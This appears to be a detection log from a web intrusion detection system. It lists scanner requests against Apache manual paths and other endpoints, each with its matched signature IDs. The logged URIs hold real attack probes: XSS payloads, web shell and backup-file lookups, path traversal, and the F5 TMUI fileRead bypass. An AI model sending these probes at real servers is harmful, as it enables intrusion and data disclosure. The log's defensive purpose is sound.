Packet [2094]	Uri [/manual/de/programs/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2095]	Uri [/manual/de/programs/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2099]	Uri [/manual/de/programs/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2100]	Uri [/manual/de/programs/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [2106]	Uri [/manual/de/programs/logresolve.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2108]	Uri [/manual/de/programs/log_server_status.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2110]	Uri [/manual/de/programs/options.conf]	Nattacks [1]	Signatures	[300001517]
Packet [2114]	Uri [/manual/de/programs/other.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2119]	Uri [/manual/de/programs/rotatelogs.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2122]	Uri [/manual/de/programs/split-logfile.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2124]	Uri [/manual/de/programs/suexec.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2130]	Uri [/manual/de/programs/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [2135]	Uri [/manual/de/programs/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [2152]	Uri [/manual/de/rewrite/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [2153]	Uri [/manual/de/rewrite/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [2154]	Uri [/manual/de/rewrite/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [2156]	Uri [/manual/de/rewrite/access.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2158]	Uri [/manual/de/rewrite/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2159]	Uri [/manual/de/rewrite/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2161]	Uri [/manual/de/rewrite/advanced.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2162]	Uri [/manual/de/rewrite/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [2164]	Uri [/manual/de/rewrite/avoid.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2165]	Uri [/manual/de/rewrite/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [2173]	Uri [/manual/de/rewrite/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2178]	Uri [/manual/de/rewrite/flags.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2182]	Uri [/manual/de/rewrite/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [2183]	Uri [/manual/de/rewrite/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2184]	Uri [/manual/de/rewrite/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2188]	Uri [/manual/de/rewrite/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2189]	Uri [/manual/de/rewrite/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [2195]	Uri [/manual/de/rewrite/intro.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2198]	Uri [/manual/de/rewrite/proxy.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2203]	Uri [/manual/de/rewrite/remapping.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2205]	Uri [/manual/de/rewrite/rewritemap.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2208]	Uri [/manual/de/rewrite/tech.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2213]	Uri [/manual/de/rewrite/vhosts.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2216]	Uri [/manual/de/rewrite/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [2221]	Uri [/manual/de/rewrite/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [2232]	Uri [/manual/de/sections.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2234]	Uri [/manual/de/server-wide.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2237]	Uri [/manual/de/sitemap.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2239]	Uri [/manual/de/socache.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2241]	Uri [/manual/de/ssl/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [2242]	Uri [/manual/de/ssl/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [2243]	Uri [/manual/de/ssl/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [2245]	Uri [/manual/de/ssl/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2246]	Uri [/manual/de/ssl/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2247]	Uri [/manual/de/ssl/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [2248]	Uri [/manual/de/ssl/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [2256]	Uri [/manual/de/ssl/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2263]	Uri [/manual/de/ssl/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [2264]	Uri [/manual/de/ssl/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2265]	Uri [/manual/de/ssl/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2269]	Uri [/manual/de/ssl/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2270]	Uri [/manual/de/ssl/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [2281]	Uri [/manual/de/ssl/ssl_compat.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2283]	Uri [/manual/de/ssl/ssl_faq.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2285]	Uri [/manual/de/ssl/ssl_howto.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2287]	Uri [/manual/de/ssl/ssl_intro.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2293]	Uri [/manual/de/ssl/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [2298]	Uri [/manual/de/ssl/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [2307]	Uri [/manual/de/stopping.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2309]	Uri [/manual/de/style/build.properties]	Nattacks [1]	Signatures	[300001517]
Packet [2334]	Uri [/manual/de/suexec.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2414]	Uri [/manual/de/upgrading.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2416]	Uri [/manual/de/urlmapping.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2425]	Uri [/manual/de/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [2436]	Uri [/manual/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2440]	Uri [/manual/howto/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [2441]	Uri [/manual/howto/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [2444]	Uri [/manual/howto/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2449]	Uri [/manual/howto/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2450]	Uri [/manual/howto/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2451]	Uri [/manual/howto/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2458]	Uri [/manual/images/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [2459]	Uri [/manual/images/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [2462]	Uri [/manual/images/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2467]	Uri [/manual/images/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2468]	Uri [/manual/images/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2469]	Uri [/manual/images/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2477]	Uri [/manual/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2478]	Uri [/manual/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2479]	Uri [/manual/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2493]	Uri [/manual/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [2504]	Uri [/mics/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2506]	Uri [/mifs/user/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2509]	Uri [/openam/oauth2/..;/ccversion/Version]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [2510]	Uri [/opencrx-core-CRX/Login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2518]	Uri [/phpinfo.php]	Nattacks [1]	Signatures	[300001887]
Packet [2519]	Uri [/phpmyadmin/]	Nattacks [1]	Signatures	[300001843]
Packet [2520]	Uri [/portal/diag/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2526]	Uri [/regenerate_page.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2534]	Uri [/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:%5Ctemp%5Cxyz.mdb&newdb=CREATE_DB&attr=]	Nattacks [1]	Signatures	[300001562]
Packet [2540]	Uri [/server-status?auto]	Nattacks [1]	Signatures	[300001899]
Packet [2541]	Uri [/server-status?refresh=1;http://example.com]	Nattacks [2]	Signatures	[300000051]	[300001899]
Packet [2545]	Uri [/spiffymcgee.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2546]	Uri [/spiffymcgee.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2551]	Uri [/struts2-blank/example/HelloWorld.action]	Nattacks [1]	Signatures	[300002704]
Packet [2558]	Uri [/tmui/login.jsp/..%3b/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release]	Nattacks [4]	Signatures	[300000051]	[300001516]	[300002734]	[300002755]
Packet [2564]	Uri [/userportal/webpages/myaccount/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2565]	Uri [/usr/local/apache2/cgi-bin/script.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2568]	Uri [/vpn/../vpns/cfg/smb.conf]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [2570]	Uri [/web/cgi-handler.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2572]	Uri [/webconsole/webpages/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2589]	Uri [/_vti_bin/_vti_aut/author.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
# N. packets [2592], [585] with alerts, N. Alerts [969]
# Execution time: 0.237107 s
